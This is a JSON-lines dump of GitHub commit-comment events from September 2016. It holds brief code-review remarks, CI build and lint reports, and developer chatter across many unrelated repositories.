{"id":"4527856847","type":"CommitCommentEvent","actor":{"login":"jkytomak"},"repo":{"name":"Opetushallitus/hakurekisteri"},"payload":{"comment":{"id":18928917,"position":null,"line":null,"path":null,"commit_id":"48966e82f400c23af6a0a4a3caf9c4cb5edcc882","created_at":"2016-09-07T14:08:04Z","updated_at":"2016-09-07T14:08:04Z","body":"Hyvä. Eiköhän tää auta aika paljon."}},"created_at":"2016-09-07T14:08:04Z"}
{"id":"4527858518","type":"CommitCommentEvent","actor":{"login":"fghaas"},"repo":{"name":"hastexo/olx-utils"},"payload":{"comment":{"id":18928919,"position":23,"line":23,"path":"bin/new_run.py","commit_id":"56122ccb5f82412708797a4dacde55906146d29f","created_at":"2016-09-07T14:08:22Z","updated_at":"2016-09-07T14:08:22Z","body":"Curiosity: What exactly would be wrong witth this?\r\n```python\r\nmsg = \"Not a valid date: '%s'\" % s\r\n```"}},"created_at":"2016-09-07T14:08:22Z"}
{"id":"4527860583","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":18928926,"position":null,"line":null,"path":null,"commit_id":"069128c1132cffa98139824fba5fb70b787a4a37","created_at":"2016-09-07T14:08:45Z","updated_at":"2016-09-07T14:08:45Z","body":"@datakurre Jenkins CI reporting about code analysis\nSee the full report here: http://jenkins.plone.org/job/package-plone.tiles/36/violations\n```\nplone/tiles/__init__.py:0:1: I001 isort found changes, run it on the file\nplone/tiles/data.py:148:1: C901 'map_to_pairs' is too complex (12)\nplone/tiles/data.py:196:1: C901 'encode' is too complex (15)\nplone/tiles/data.py:277:1: C901 'decode' is too complex (13)\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2016-09-07T14:08:45Z"}
{"id":"4527863098","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18928931,"position":4,"line":35,"path":"groot/groot.go","commit_id":"7a944282f0df0832bbe8f40bb1b1e3053a30e2b4","created_at":"2016-09-07T14:09:14Z","updated_at":"2016-09-07T14:09:14Z","body":"I don't know, it feels weird that metrics go through the snapshot driver... It probably is the most convenient solution for now but looks like a useful future refactoring to split that out..."}},"created_at":"2016-09-07T14:09:14Z"}
{"id":"4527864437","type":"CommitCommentEvent","actor":{"login":"fghaas"},"repo":{"name":"hastexo/olx-utils"},"payload":{"comment":{"id":18928934,"position":44,"line":44,"path":"olxutils/templates.py","commit_id":"56122ccb5f82412708797a4dacde55906146d29f","created_at":"2016-09-07T14:09:26Z","updated_at":"2016-09-07T14:09:26Z","body":"I *think* this is a case for `os.path.join()` for Windows compatibility."}},"created_at":"2016-09-07T14:09:26Z"}
{"id":"4527866724","type":"CommitCommentEvent","actor":{"login":"clacote"},"repo":{"name":"PieR-E/VelovWaitingTimeProject"},"payload":{"comment":{"id":18928938,"position":107,"line":121,"path":"fortest.py","commit_id":"096a66c1ae208a7bb05073e042e05272e0b9976d","created_at":"2016-09-07T14:09:52Z","updated_at":"2016-09-07T14:09:52Z","body":"La loi de Poisson, moi je ne trouve pas ça terrible."}},"created_at":"2016-09-07T14:09:52Z"}
{"id":"4527869221","type":"CommitCommentEvent","actor":{"login":"Daeral"},"repo":{"name":"plsfixrito/KappAIO"},"payload":{"comment":{"id":18928947,"position":14,"line":65,"path":"KappAIO/KappAIO/Champions/Syndra/SyndraBalls.cs","commit_id":"4b91b24d812baeb8e612dc4da8a41e40a628c44f","created_at":"2016-09-07T14:10:19Z","updated_at":"2016-09-07T14:10:19Z","body":"PogChamp"}},"created_at":"2016-09-07T14:10:19Z"}
{"id":"4527869473","type":"CommitCommentEvent","actor":{"login":"handsomelin"},"repo":{"name":"NTUGrandChallenge/GC-Recruit-Web"},"payload":{"comment":{"id":18928948,"position":null,"line":null,"path":null,"commit_id":"6763523e19ea68028264b23e6a2d18f3b1a04590","created_at":"2016-09-07T14:10:22Z","updated_at":"2016-09-07T14:10:22Z","body":"我這邊是故意開放給未登入者看欸\r\n（來用用看這裡的留言功能XD）"}},"created_at":"2016-09-07T14:10:22Z"}
{"id":"4527869752","type":"CommitCommentEvent","actor":{"login":"reinholdsson"},"repo":{"name":"cloudyr/aws.s3"},"payload":{"comment":{"id":18928950,"position":null,"line":null,"path":null,"commit_id":"d1d91729d78d38a38aea4d6b52f7156d7e563734","created_at":"2016-09-07T14:10:24Z","updated_at":"2016-09-07T14:10:24Z","body":"@leeper Thanks for quickly looking into this.\r\n\r\nNot sure if you have completed it yet. I tried re-installing the package from github, but now get: `Warning message: In parse_aws_s3_response(r, Sig) : Forbidden (HTTP 403).`\r\n\r\nI've forked the package, to see if I manage to find what causes it (don't expect me to succeed though) :)"}},"created_at":"2016-09-07T14:10:24Z"}
{"id":"4527876124","type":"CommitCommentEvent","actor":{"login":"arbrandes"},"repo":{"name":"hastexo/olx-utils"},"payload":{"comment":{"id":18928965,"position":23,"line":23,"path":"bin/new_run.py","commit_id":"56122ccb5f82412708797a4dacde55906146d29f","created_at":"2016-09-07T14:11:31Z","updated_at":"2016-09-07T14:11:31Z","body":"Nothing wrong.  It's just that the new recommended way to do it is with format(), IIRC because Python 3 doesn't support the old % way."}},"created_at":"2016-09-07T14:11:31Z"}
{"id":"4527879900","type":"CommitCommentEvent","actor":{"login":"arbrandes"},"repo":{"name":"hastexo/olx-utils"},"payload":{"comment":{"id":18928972,"position":44,"line":44,"path":"olxutils/templates.py","commit_id":"56122ccb5f82412708797a4dacde55906146d29f","created_at":"2016-09-07T14:12:12Z","updated_at":"2016-09-07T14:12:12Z","body":"Pretty much, yes.  Nice catch."}},"created_at":"2016-09-07T14:12:12Z"}
{"id":"4527886403","type":"CommitCommentEvent","actor":{"login":"TinkerWorkshop"},"repo":{"name":"anv-devs/wp-anvato-plugin"},"payload":{"comment":{"id":18928983,"position":null,"line":null,"path":null,"commit_id":"c58e26dff0671bd7feb1e60a29ecdfcdd09251e4","created_at":"2016-09-07T14:13:19Z","updated_at":"2016-09-07T14:13:19Z","body":"@anv-devs \r\nUsing \"get\" method on WP VIP environment for Anvato API fails with message:\r\n\"Auth error. Please check your configuration parameters on Settings page.\"\r\nIt seems that the method was switched to PUSH, but GET is still forced for WP VIP environments, which result in error and loss of functionality."}},"created_at":"2016-09-07T14:13:19Z"}
{"id":"4527890163","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18928989,"position":null,"line":null,"path":null,"commit_id":"1d1a7ad1e41a1855c42d01b8a9b066a0ab7021fb","created_at":"2016-09-07T14:13:55Z","updated_at":"2016-09-07T14:13:55Z","body":"I should specify further:\r\n\r\n- If the search was initiated from the toolbar search field, and the sub didn't exist--upon returning back to the overview--the focus will be put on the toolbar search field for easy adjustments."}},"created_at":"2016-09-07T14:13:55Z"}
{"id":"4527895852","type":"CommitCommentEvent","actor":{"login":"chadrick-kwag"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18928996,"position":211,"line":165,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-07T14:14:53Z","updated_at":"2016-09-07T14:14:53Z","body":"declared and defined here. but i don't think it can be accessed in another function. or i may be wrong."}},"created_at":"2016-09-07T14:14:53Z"}
{"id":"4527897213","type":"CommitCommentEvent","actor":{"login":"chadrick-kwag"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18928998,"position":247,"line":201,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-07T14:15:08Z","updated_at":"2016-09-07T14:15:08Z","body":"not the kind of LR detection i thought. the packet already has which LR it wants and i see that the value is saved in 'LR_value'. "}},"created_at":"2016-09-07T14:15:08Z"}
{"id":"4527901732","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18929006,"position":null,"line":null,"path":null,"commit_id":"90824fd02e62bbaac0b2d4e1cd05a4100a1fb843","created_at":"2016-09-07T14:15:54Z","updated_at":"2016-09-07T14:15:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 962](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12899&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:45"}},"created_at":"2016-09-07T14:15:54Z"}
{"id":"4527902341","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18929008,"position":48,"line":62,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"86369ce1da14b91deb28ddc32d8cbdc1aab28b96","created_at":"2016-09-07T14:16:00Z","updated_at":"2016-09-07T14:16:00Z","body":"The version upgrade plug-in also defines functions that get the version number of a type of file. In this case you need to find a plug-in that reads profile-type files, get its metadata and request the version number like so:\r\n\r\n    version = metadata[\"sources\"][\"profile\"][\"get_version\"](serialized)"}},"created_at":"2016-09-07T14:16:00Z"}
{"id":"4527902994","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18929010,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-07T14:16:07Z","updated_at":"2016-09-07T14:16:07Z","body":"WTF how to transfer player now?"}},"created_at":"2016-09-07T14:16:07Z"}
{"id":"4527904614","type":"CommitCommentEvent","actor":{"login":"chadrick-kwag"},"repo":{"name":"AKA-Intelligence/musio_arduino"},"payload":{"comment":{"id":18929016,"position":253,"line":206,"path":"apard_p0.ino","commit_id":"97312bdfabe93bfbe8ab829d23fd6e43c07cb008","created_at":"2016-09-07T14:16:22Z","updated_at":"2016-09-07T14:16:22Z","body":"not sure exactly how the UART RX complete interrupt acts, but if there is an index parameter pointing to which location of RX buffer should be written next, the problem can be solved in a more simple way: just set the index parameter=0"}},"created_at":"2016-09-07T14:16:22Z"}
{"id":"4527905734","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18929020,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-07T14:16:33Z","updated_at":"2016-09-07T14:16:33Z","body":"ok :D"}},"created_at":"2016-09-07T14:16:33Z"}
{"id":"4527910587","type":"CommitCommentEvent","actor":{"login":"JerryTsang"},"repo":{"name":"PyYoshi/android_kernel_sharp_303sh"},"payload":{"comment":{"id":18929032,"position":898,"line":9540,"path":"drivers/sharp/shtps/sy3000/tm2923-002/shtps_rmi_spi.c","commit_id":"6ab44044ab847a50613a10c73b47f2409271228a","created_at":"2016-09-07T14:17:23Z","updated_at":"2016-09-07T14:17:23Z","body":"why so complicated ?"}},"created_at":"2016-09-07T14:17:23Z"}
{"id":"4527912248","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"rstudio/bookdown-demo"},"payload":{"comment":{"id":18929035,"position":null,"line":null,"path":null,"commit_id":"23ba576aa59b84b0e2b3b07be7fcf60e655985b8","created_at":"2016-09-07T14:17:40Z","updated_at":"2016-09-07T14:17:40Z","body":"Did you also make the changes in `_output.yml` like what I did above?"}},"created_at":"2016-09-07T14:17:40Z"}
{"id":"4527918400","type":"CommitCommentEvent","actor":{"login":"sjl"},"repo":{"name":"sjl/cl-nrepl"},"payload":{"comment":{"id":18929042,"position":null,"line":null,"path":null,"commit_id":"31d7af53acdee4d6ffc4abfa9e56437bdb33d685","created_at":"2016-09-07T14:18:39Z","updated_at":"2016-09-07T14:18:39Z","body":"Perfect, thanks!"}},"created_at":"2016-09-07T14:18:39Z"}
{"id":"4527921726","type":"CommitCommentEvent","actor":{"login":"akhoury"},"repo":{"name":"ractivejs/ractive"},"payload":{"comment":{"id":18929046,"position":null,"line":null,"path":null,"commit_id":"f169440fc2664482fa19cd630479a60c0a87b8ec","created_at":"2016-09-07T14:19:11Z","updated_at":"2016-09-07T14:19:11Z","body":"rip"}},"created_at":"2016-09-07T14:19:11Z"}
{"id":"4527923515","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/balrog-ui"},"payload":{"comment":{"id":18929047,"position":null,"line":null,"path":null,"commit_id":"f0c95469f62e0410bdd18011163ba87179c8e15e","created_at":"2016-09-07T14:19:27Z","updated_at":"2016-09-07T14:19:27Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#bM52LtWTR6WFKUZREeHXfw"}},"created_at":"2016-09-07T14:19:27Z"}
{"id":"4527926806","type":"CommitCommentEvent","actor":{"login":"gau-veldt"},"repo":{"name":"gau-veldt/OmegaRising"},"payload":{"comment":{"id":18929052,"position":null,"line":null,"path":null,"commit_id":"c21b84c38842592f179589d17007409d57db8847","created_at":"2016-09-07T14:19:58Z","updated_at":"2016-09-07T14:19:58Z","body":"Before logged in:\r\n![screenshot_01](https://cloud.githubusercontent.com/assets/1862162/18315279/4638b698-74cb-11e6-8f22-65d9a6fd9207.png)\r\nAfter logged in:\r\n![screenshot_02](https://cloud.githubusercontent.com/assets/1862162/18315283/495c5500-74cb-11e6-8338-980110cd457b.png)\r\n"}},"created_at":"2016-09-07T14:19:58Z"}
{"id":"4527927826","type":"CommitCommentEvent","actor":{"login":"Creeperface01"},"repo":{"name":"iTXTech/SynapseAPI"},"payload":{"comment":{"id":18929055,"position":null,"line":null,"path":null,"commit_id":"d274062addf3beeec541c6259ecdafbda286e4bd","created_at":"2016-09-07T14:20:09Z","updated_at":"2016-09-07T14:20:09Z","body":"WHAT? how to get SynapsePlayer"}},"created_at":"2016-09-07T14:20:09Z"}
{"id":"4527927910","type":"CommitCommentEvent","actor":{"login":"caowenwei"},"repo":{"name":"tellingeric/loopin-api"},"payload":{"comment":{"id":18929056,"position":null,"line":null,"path":null,"commit_id":"5da77c089e9d90f2a91f8326801307bb823acf44","created_at":"2016-09-07T14:20:10Z","updated_at":"2016-09-07T14:20:10Z","body":"哪里有CRD，明明只有RD"}},"created_at":"2016-09-07T14:20:10Z"}
{"id":"4527933276","type":"CommitCommentEvent","actor":{"login":"cantunes20"},"repo":{"name":"cantunes20/First-Website-DOGS"},"payload":{"comment":{"id":18929067,"position":null,"line":null,"path":null,"commit_id":"298a3cb704402d60f474c14ada81f3e64b7a19b4","created_at":"2016-09-07T14:21:01Z","updated_at":"2016-09-07T14:21:01Z","body":"This is the first HTML file upload"}},"created_at":"2016-09-07T14:21:01Z"}
{"id":"4527933361","type":"CommitCommentEvent","actor":{"login":"lynnea101"},"repo":{"name":"lynnea101/First_Website_Dogs"},"payload":{"comment":{"id":18929070,"position":null,"line":null,"path":null,"commit_id":"82b2d3532cfd00a8a24e2169ec274a297e90bae8","created_at":"2016-09-07T14:21:02Z","updated_at":"2016-09-07T14:21:02Z","body":"This is the first HTML upload file."}},"created_at":"2016-09-07T14:21:02Z"}
{"id":"4527938397","type":"CommitCommentEvent","actor":{"login":"reallybobo"},"repo":{"name":"reallybobo/CTFatt"},"payload":{"comment":{"id":18929085,"position":null,"line":null,"path":null,"commit_id":"d5b5e8cebab254f0af8d51b55eed3db41e59f76f","created_at":"2016-09-07T14:21:50Z","updated_at":"2016-09-07T14:21:50Z","body":"Welcome to CTFatt!!!"}},"created_at":"2016-09-07T14:21:50Z"}
{"id":"4527939196","type":"CommitCommentEvent","actor":{"login":"bradfitz"},"repo":{"name":"golang/go"},"payload":{"comment":{"id":18929091,"position":null,"line":null,"path":null,"commit_id":"ca264cdc6247141a1e042f38c83fff4783f03324","created_at":"2016-09-07T14:21:57Z","updated_at":"2016-09-07T14:21:57Z","body":"We don't use Github comments on commits. Please file a bug."}},"created_at":"2016-09-07T14:21:57Z"}
{"id":"4527946996","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":18929102,"position":null,"line":null,"path":null,"commit_id":"1fc7546107e4d1dd9a8e38644678484bd74aedbe","created_at":"2016-09-07T14:23:14Z","updated_at":"2016-09-07T14:23:14Z","body":":+1: "}},"created_at":"2016-09-07T14:23:14Z"}
{"id":"4527949980","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18929109,"position":null,"line":null,"path":null,"commit_id":"d1bca4232712cbf34266f578d0b23e2913ee8276","created_at":"2016-09-07T14:23:45Z","updated_at":"2016-09-07T14:23:45Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#cwQdxP1cRke_vTvHiM18MA"}},"created_at":"2016-09-07T14:23:45Z"}
{"id":"4527951804","type":"CommitCommentEvent","actor":{"login":"sadhyama"},"repo":{"name":"sadhyama/parodus"},"payload":{"comment":{"id":18929110,"position":null,"line":null,"path":null,"commit_id":"2677d5637b408bf54c9f2832ea0c50021ca506f9","created_at":"2016-09-07T14:24:02Z","updated_at":"2016-09-07T14:24:02Z","body":"Started with code modifications for websocket interface for parodus. Code changes are in progress."}},"created_at":"2016-09-07T14:24:02Z"}
{"id":"4527961580","type":"CommitCommentEvent","actor":{"login":"teyden"},"repo":{"name":"Gene42/phenotips-niaid"},"payload":{"comment":{"id":18929132,"position":27,"line":107,"path":"genetic-evaluation/api/src/main/java/org/phenotips/data/genetics/internal/VariantListController.java","commit_id":"812f65517a72e4ef605362de08185c1725a8874c","created_at":"2016-09-07T14:25:26Z","updated_at":"2016-09-07T14:25:26Z","body":"Sorry, I'm not sure what you are asking? \r\n\r\nDates for sequencing and when the report was sent to the physician, requests from the first round of development, are no longer needed. "}},"created_at":"2016-09-07T14:25:26Z"}
{"id":"4527963011","type":"CommitCommentEvent","actor":{"login":"tongqing521"},"repo":{"name":"tongqing521/hello-world"},"payload":{"comment":{"id":18929135,"position":2,"line":2,"path":"README.md","commit_id":"076c4e078bf861eb53341384d5c48c5877da1b4b","created_at":"2016-09-07T14:25:39Z","updated_at":"2016-09-07T14:25:39Z","body":"fddgdfdgdgg"}},"created_at":"2016-09-07T14:25:39Z"}
{"id":"4527963919","type":"CommitCommentEvent","actor":{"login":"gmouchakis"},"repo":{"name":"big-data-europe/docker-hive"},"payload":{"comment":{"id":18929139,"position":null,"line":null,"path":null,"commit_id":"f045946f91e966e3943d6994040b516d50af0ec7","created_at":"2016-09-07T14:25:46Z","updated_at":"2016-09-07T14:25:46Z","body":"I followed the README and run:\r\n\r\n```\r\n$ docker-compose build\r\n$ docker-compose up namenode hive-metastore-postgresql\r\n$ docker-compose up datanode hive-metastore\r\n$ docker-compose up hive-server\r\n$ docker exec -it hive-server bash\r\nroot@ddb46e84e323:/opt# /opt/hive/bin/beeline -u jdbc:hive2://localhost:10000\r\n/opt/hive/bin/beeline: line 22: ps: command not found\r\n/opt/hive/bin/beeline: line 31: ps: command not found\r\nls: cannot access /opt/hive/lib/hive-jdbc-*-standalone.jar: No such file or directory\r\nConnecting to jdbc:hive2://localhost:10000\r\nSLF4J: Class path contains multiple SLF4J bindings.\r\nSLF4J: Found binding in [jar:file:/opt/hive/lib/log4j-slf4j-impl-2.4.1.jar!/org/slf4j/impl/StaticLoggerBinder.class]\r\nSLF4J: Found binding in [jar:file:/opt/hadoop-2.7.1/share/hadoop/common/lib/slf4j-log4j12-1.7.10.jar!/org/slf4j/impl/StaticLoggerBinder.class]\r\nSLF4J: See http://www.slf4j.org/codes.html#multiple_bindings for an explanation.\r\nSLF4J: Actual binding is of type [org.apache.logging.slf4j.Log4jLoggerFactory]\r\nConnected to: Apache Hive (version 2.1.0)\r\nDriver: Hive JDBC (version 2.1.0)\r\n16/09/07 01:08:45 [main]: WARN jdbc.HiveConnection: Request to set autoCommit to false; Hive does not support autoCommit=false.\r\nTransaction isolation: TRANSACTION_REPEATABLE_READ\r\nBeeline version 2.1.0 by Apache Hive\r\n```\r\n\r\nerrors\r\n```\r\n/opt/hive/bin/beeline: line 22: ps: command not found\r\n/opt/hive/bin/beeline: line 31: ps: command not found\r\n```\r\ncan be fixed by installing procps as stated in https://github.com/big-data-europe/docker-hive/issues/2"}},"created_at":"2016-09-07T14:25:46Z"}
{"id":"4527964513","type":"CommitCommentEvent","actor":{"login":"tongqing521"},"repo":{"name":"tongqing521/hello-world"},"payload":{"comment":{"id":18929141,"position":2,"line":2,"path":"README.md","commit_id":"076c4e078bf861eb53341384d5c48c5877da1b4b","created_at":"2016-09-07T14:25:51Z","updated_at":"2016-09-07T14:25:51Z","body":"ddsffdff"}},"created_at":"2016-09-07T14:25:51Z"}
{"id":"4527967948","type":"CommitCommentEvent","actor":{"login":"himikof"},"repo":{"name":"intellij-rust/intellij-rust"},"payload":{"comment":{"id":18929153,"position":12,"line":39,"path":"src/main/kotlin/org/rust/cargo/toolchain/RustToolchain.kt","commit_id":"bf34d880f0c384119e0e54d6f0b9b1b0062bdb83","created_at":"2016-09-07T14:26:23Z","updated_at":"2016-09-07T14:26:23Z","body":"It appears that this method will return a `Rustup` instance if `rustup` is installed, but the current toolchain is not managed by it. Is this desired? Shouldn't the `RustToolchain` know whether it is managed or not?"}},"created_at":"2016-09-07T14:26:23Z"}
{"id":"4527972695","type":"CommitCommentEvent","actor":{"login":"ciibot"},"repo":{"name":"linuxfoundation/cii-best-practices-badge"},"payload":{"comment":{"id":18929166,"position":12,"line":null,"path":"app/views/project_stats/index.html.erb","commit_id":"e8729764ec1587ab23c6506b690f3386c0866fb2","created_at":"2016-09-07T14:27:00Z","updated_at":"2016-09-07T14:27:00Z","body":"Move code into controller"}},"created_at":"2016-09-07T14:27:00Z"}
{"id":"4527973151","type":"CommitCommentEvent","actor":{"login":"hayco"},"repo":{"name":"HuygensING/langident"},"payload":{"comment":{"id":18929167,"position":null,"line":null,"path":null,"commit_id":"cbd5dee88f95f55e28c5b3e4d807826197e0028d","created_at":"2016-09-07T14:27:04Z","updated_at":"2016-09-07T14:27:04Z","body":"Looks like Google's \"optional\" (line 4) managed to sneak in here, instead of java.util.Optional"}},"created_at":"2016-09-07T14:27:04Z"}
{"id":"4527977882","type":"CommitCommentEvent","actor":{"login":"hayco"},"repo":{"name":"HuygensING/langident"},"payload":{"comment":{"id":18929177,"position":4,"line":4,"path":"src/main/java/nl/knaw/huygens/pergamon/nlp/langident/health/ModelHealthCheck.java","commit_id":"cbd5dee88f95f55e28c5b3e4d807826197e0028d","created_at":"2016-09-07T14:27:45Z","updated_at":"2016-09-07T14:27:45Z","body":"Looks like Google's \"optional\" managed to sneak in here, instead of java.util.Optional"}},"created_at":"2016-09-07T14:27:45Z"}
{"id":"4527978380","type":"CommitCommentEvent","actor":{"login":"fffonion"},"repo":{"name":"joylio/joyncong"},"payload":{"comment":{"id":18929179,"position":9,"line":9,"path":"Our Shared Goals/xShooterUI.md","commit_id":"f50cb14ee96dc7ba51788fa1203244042711b5f7","created_at":"2016-09-07T14:27:48Z","updated_at":"2016-09-07T14:27:48Z","body":"hahaha shi shenmegui 😃 "}},"created_at":"2016-09-07T14:27:48Z"}
{"id":"4527978518","type":"CommitCommentEvent","actor":{"login":"FroMage"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":18929180,"position":5,"line":82,"path":"compiler-java/src/com/redhat/ceylon/compiler/java/tools/CeyloncTool.java","commit_id":"db807b2a703da06cbbf9b71943aff1d44a893724","created_at":"2016-09-07T14:27:50Z","updated_at":"2016-09-07T14:27:50Z","body":"Fixed."}},"created_at":"2016-09-07T14:27:50Z"}
{"id":"4527984242","type":"CommitCommentEvent","actor":{"login":"Flyhalf205"},"repo":{"name":"Flyhalf205/android_frameworks_base"},"payload":{"comment":{"id":18929192,"position":null,"line":null,"path":null,"commit_id":"755613da248962a7c55a85e7ae85db5a0b8162c7","created_at":"2016-09-07T14:28:39Z","updated_at":"2016-09-07T14:28:39Z","body":"This is a bad hack. I will try to get it working properly."}},"created_at":"2016-09-07T14:28:39Z"}
{"id":"4527986287","type":"CommitCommentEvent","actor":{"login":"wsnipex"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18929199,"position":null,"line":null,"path":null,"commit_id":"2cb1ef00750dd07e73c18bfe1fe3f7ddae9628fb","created_at":"2016-09-07T14:28:56Z","updated_at":"2016-09-07T14:28:56Z","body":"done, see the PR"}},"created_at":"2016-09-07T14:28:56Z"}
{"id":"4527987217","type":"CommitCommentEvent","actor":{"login":"reinholdsson"},"repo":{"name":"cloudyr/aws.s3"},"payload":{"comment":{"id":18929201,"position":13,"line":61,"path":"R/s3HTTP.R","commit_id":"d1d91729d78d38a38aea4d6b52f7156d7e563734","created_at":"2016-09-07T14:29:04Z","updated_at":"2016-09-07T14:29:04Z","body":"@leeper URLencode also encode `/` to `%2F`, which causes 403."}},"created_at":"2016-09-07T14:29:04Z"}
{"id":"4527989968","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18929210,"position":71,"line":71,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T14:29:26Z","updated_at":"2016-09-07T14:29:26Z","body":"Cuando hay un try, lo que está dentro del catch puede fallar y enviar una Exception. En este caso lo que está dentro del catch no manda exception así q estaría de más y el ingreso siempre va a ser true."}},"created_at":"2016-09-07T14:29:26Z"}
{"id":"4527991141","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"Gene42/phenotips-niaid"},"payload":{"comment":{"id":18929211,"position":27,"line":107,"path":"genetic-evaluation/api/src/main/java/org/phenotips/data/genetics/internal/VariantListController.java","commit_id":"812f65517a72e4ef605362de08185c1725a8874c","created_at":"2016-09-07T14:29:36Z","updated_at":"2016-09-07T14:29:36Z","body":"Yes, that's what I was asking, is the removed functionality indeed no longer needed, or was it removed by accident.?"}},"created_at":"2016-09-07T14:29:36Z"}
{"id":"4527993022","type":"CommitCommentEvent","actor":{"login":"westhouseit"},"repo":{"name":"westhouseit/multiselect"},"payload":{"comment":{"id":18929217,"position":null,"line":null,"path":null,"commit_id":"8401edf74d464b56890009822b653553a50feeac","created_at":"2016-09-07T14:29:50Z","updated_at":"2016-09-07T14:29:50Z","body":"It's move up/down not sorting, oops."}},"created_at":"2016-09-07T14:29:50Z"}
{"id":"4527994738","type":"CommitCommentEvent","actor":{"login":"SarahZhao806"},"repo":{"name":"SarahZhao806/NodeJS_Snippet"},"payload":{"comment":{"id":18929222,"position":36,"line":36,"path":"ask.js","commit_id":"bd08d116cc95435b55bd03453b9510e0f7e768a1","created_at":"2016-09-07T14:30:07Z","updated_at":"2016-09-07T14:30:07Z","body":"should ask first question when start the program. "}},"created_at":"2016-09-07T14:30:07Z"}
{"id":"4528002070","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18929242,"position":83,"line":83,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T14:31:14Z","updated_at":"2016-09-07T14:31:14Z","body":"Lo mismo que en el caso anterior, el try/catch no es necesario."}},"created_at":"2016-09-07T14:31:14Z"}
{"id":"4528004318","type":"CommitCommentEvent","actor":{"login":"teyden"},"repo":{"name":"Gene42/phenotips-niaid"},"payload":{"comment":{"id":18929247,"position":27,"line":107,"path":"genetic-evaluation/api/src/main/java/org/phenotips/data/genetics/internal/VariantListController.java","commit_id":"812f65517a72e4ef605362de08185c1725a8874c","created_at":"2016-09-07T14:31:33Z","updated_at":"2016-09-07T14:31:33Z","body":"Yes, no longer needed. There will be a few new properties added instead."}},"created_at":"2016-09-07T14:31:33Z"}
{"id":"4528005470","type":"CommitCommentEvent","actor":{"login":"scalderon"},"repo":{"name":"dagyus/Cuentas-Bancarias"},"payload":{"comment":{"id":18929250,"position":98,"line":98,"path":"Cuentas.java","commit_id":"086ab48365ec2dda36268e93589a082e6d79b99a","created_at":"2016-09-07T14:31:43Z","updated_at":"2016-09-07T14:31:43Z","body":"try/catch no es necesario"}},"created_at":"2016-09-07T14:31:43Z"}
{"id":"4528007608","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18929258,"position":null,"line":null,"path":null,"commit_id":"feb39d673421d4e80369cff9c3112a25b09eb5df","created_at":"2016-09-07T14:32:02Z","updated_at":"2016-09-07T14:32:02Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - Win64-Windows-7-VisualStudio-12: OK (2330 of 2334 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: ZSZ big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-feb39d673421d4e80369cff9c3112a25b09eb5df-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> \n"}},"created_at":"2016-09-07T14:32:02Z"}
